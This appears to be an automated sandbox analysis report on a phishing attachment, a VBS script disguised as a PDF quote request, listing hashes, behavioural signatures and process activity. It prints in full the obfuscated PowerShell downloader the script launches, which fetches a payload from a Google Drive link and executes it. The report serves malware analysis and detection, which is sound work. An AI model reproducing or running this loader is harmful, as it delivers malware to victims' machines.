Analysis
max time kernel: 149s
max time network: 123s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 18-11-2024 09:08
Static task: static1
Behavioral task: behavioral1
  Sample: Fluor RFQ1475·pdf.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: Fluor RFQ1475·pdf.vbs
  Resource: win10v2004-20241007-en
General
Target: Fluor RFQ1475·pdf.vbs
Size: 15KB
MD5: 695ec6cd0d4d8abaab5bed4e4f37153d
SHA1: 027b2b36b69e9f41bc5b54493533d8b417192255
SHA256: 3bb02f08d2d70b6f126d045a385a241330dbe96689304c48f1b9a1958297a060
SHA512: 36a68f1693a03903990cf86eafe285cacab31b8b89a2a7c033e06545942604d8c735f4ff4d15d33c77e83379d74064954cd12a5fcb1bc3ea2b6cc289ef63ae1c
SSDEEP: 384:aCTCJn/NHU8wde1pmZaKHQtL1YNBcYK7CB7qdgcKU:JuJnFH/w6pmmtl5WB7qm8
Malware Config
Signatures
- Blocklisted process makes network request (1 IoC)
  flow 3, PID 2756, WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  PID 2204, powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, PID 2204, powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  PID 2756 (WScript.exe) wrote to memory of PID 2204, procid_target 30 (same event recorded 3 times)
Processes
- C:\Windows\System32\WScript.exe (PID 2756)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fluor RFQ1475·pdf.vbs"
  Signatures: Blocklisted process makes network request; Suspicious use of WriteProcessMemory
  Child process (command line recorded as captured):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. 
Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep 
CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet 
RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"2⤵
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  PID: 2204
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 70KB
MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1: 1723be06719828dda65ad804298d0431f6aff976
SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b